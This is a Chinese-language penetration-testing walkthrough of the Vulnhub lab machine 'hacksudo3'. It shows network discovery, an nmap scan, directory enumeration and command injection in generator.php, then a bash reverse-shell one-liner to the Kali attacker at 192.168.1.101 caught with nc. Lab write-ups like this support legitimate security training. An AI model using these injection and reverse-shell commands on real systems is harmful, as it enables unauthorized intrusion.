Bootstrap

带你玩转渗透测试靶场Vulnhub——hacksudo3

靶机获取:因本人网盘内存满了无法上传靶场各位可以在文章末尾添加我的v来获取靶场

一.搭建环境靶机

攻击机kali  IP地址:192.168.1.101

靶机IP地址:192.168.1.108

注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段即可)

靶机环境搭建步骤

1.将下载好的hacksudo3导入VirtualBox

2.将网卡设置成和kali攻击机同一网段即可

二.实战

1.网络发现

netdiscover -i eth0 -r 192.168.1.0/24(指定网卡扫描)

2.查看靶机开放端口

使用nmap -A -sV -T4 -p- 靶机IP 查看靶机开放端口

根据以上信息可得知开放了80端口

21和22端口的状态均为filtered

3.枚举漏洞

访问80端口分析数据,查看源码

源码没有问题,先扫一下目录

从目录里面发现/hidden/  我们先去访问一下http://192.168.1.108/hidden,由此发现好像是一个解密的

继续访问下一个,http://192.168.1.108/decrypt/ 发现这个也是一个解密的网站

访问:http://192.168.1.108/bruteforce/这也是一个解密用的网站

我们先来访问默认的登录页面:http://192.168.1.108/login.php 竟然发现了这个网页的登录页面

 刚才目录里还扫描到了info.php,我们现在来访问一下看看里面有什么可用的资源

访问:192.168.1.108/generator.php发现了一个smart登录口随便输一个字符进去,看一下是否存在命令注入漏洞

提交ls -la 以上的命令都可以执行的话,证明是存在命令注入漏洞的

2.漏洞利用

生成一个反向的shell

`bash -c "bash -i >& /dev/tcp/192.168.1.101/6666 0>&1"`

KALI开启本地监听:nc -lvp 6666

然后成功拿到shell

总结:本靶机是通过命令注入漏洞进行渗透,获取root权限

悦读

道可道,非常道;名可名,非常名。 无名,天地之始,有名,万物之母。 故常无欲,以观其妙,常有欲,以观其徼。 此两者,同出而异名,同谓之玄,玄之又玄,众妙之门。

;